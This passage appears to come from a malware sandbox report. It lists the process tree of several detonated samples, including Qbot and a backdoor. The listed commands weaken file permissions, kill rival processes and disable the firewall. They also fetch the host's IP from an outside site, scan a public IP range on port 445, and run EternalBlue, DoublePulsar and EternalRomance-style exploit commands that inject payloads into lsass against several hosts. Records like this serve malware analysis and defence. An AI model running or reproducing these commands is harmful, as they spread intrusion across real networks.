C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:6068
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F4⤵
- System Location Discovery: System Language Discovery
PID:6072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5448
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F4⤵PID:6088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5488
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g system:F4⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5224
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g everyone:F4⤵PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:6040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g system:F4⤵PID:6012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:6060
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F4⤵PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g system:F4⤵PID:5444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:6084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F4⤵PID:6088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g system:F4⤵PID:5488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5284
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F4⤵PID:5324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5140
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F4⤵PID:5748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5856
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F4⤵PID:5844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5652
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Mysql\same.bat /p system:n4⤵PID:1964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe"C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe" "C:\Users\Admin\Desktop\Trojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exe"2⤵
- Executes dropped EXE
PID:1136
-
-
C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exe"C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:132 -
C:\Windows\SysWOW64\cmd.exe"C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
PID:424
-
-
C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 6202⤵
- Program crash
PID:4712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4832 -ip 48321⤵PID:4392
-
C:\Windows\Fonts\Mysql\svchost.exeC:\Windows\Fonts\Mysql\svchost.exe1⤵
- Executes dropped EXE
PID:3552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\Mysql\cmd.bat" "2⤵PID:584
-
C:\Windows\SysWOW64\mode.commode con cols=50 lines=403⤵PID:2804
-
-
C:\Windows\SysWOW64\sc.exesc config Browser start= auto3⤵
- Launches sc.exe
PID:3984
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanworkstation start= auto3⤵
- Launches sc.exe
PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= auto3⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4236
-
-
C:\Windows\SysWOW64\net.exenet start Browser3⤵PID:4072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Browser4⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
C:\Windows\SysWOW64\net.exenet start lanmanworkstation3⤵PID:1784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start lanmanworkstation4⤵PID:2416
-
-
-
C:\Windows\SysWOW64\net.exenet start lanmanserver3⤵PID:700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start lanmanserver4⤵PID:2032
-
-
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:3140
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
PID:2852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Eter.exe3⤵
- Kills process with taskkill
PID:2648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
PID:4880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
PID:404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Eter.exe3⤵
- Kills process with taskkill
PID:1340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
PID:4396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
PID:4992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
PID:1576
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2148
-
-
C:\Windows\Fonts\Mysql\wget.exewget -O temp.txt "http://v4.ipv6-test.com/api/myip.php"3⤵
- Executes dropped EXE
PID:4960
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1156
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2100
-
-
C:\Windows\Fonts\Mysql\taskhost.exetaskhost.exe tcp 181.215.0.254 181.215.255.254 445 450 /save3⤵
- Executes dropped EXE
PID:2872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.63⤵PID:5228
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.6 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.6.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:6216
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.6 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.6.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:5436
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7124
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4760
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.6 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:6724
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7948
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9268
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.6 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.6.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9340
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5800
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.6 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.223⤵PID:5268
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.22 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.22.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:7556
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.22 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.22.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:7148
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5356
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4960
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.22 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:2400
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9016
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9532
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.22 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.22.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9620
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.22 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.253⤵PID:5868
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.25 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.25.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:6392
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.25 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.25.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:6796
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6336
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6604
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.25 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:1528
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5932
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:10036
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.25 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.25.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9424
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10036
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.25 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.283⤵PID:6352
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.28 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.28.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:5820
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.28 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.28.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:1288
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.28 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:1964
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.28 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6952
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.28 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.523⤵PID:6776
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.52 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.52.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:6076
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.52 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.52.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:5700
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7560
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7952
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.52 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5548
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10068
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.52 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.52.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8544
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9760
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.52 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:7588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.713⤵PID:7252
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.71 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.71.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- Drops file in Windows directory
PID:4904
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.71 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.71.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:2236
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.71 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:1492
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.71 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4220
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.71 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:7040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.733⤵PID:2680
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.73 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.73.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:8084
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.4.73 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.73.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:1208
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7860
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8060
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.4.73 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5696
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5676
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9184
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.4.73 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.4.73.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9968
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:3752
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.4.73 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.4.913⤵PID:4620
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.4.91 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.4.91.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Location Discovery: System Language Discovery
PID:5280
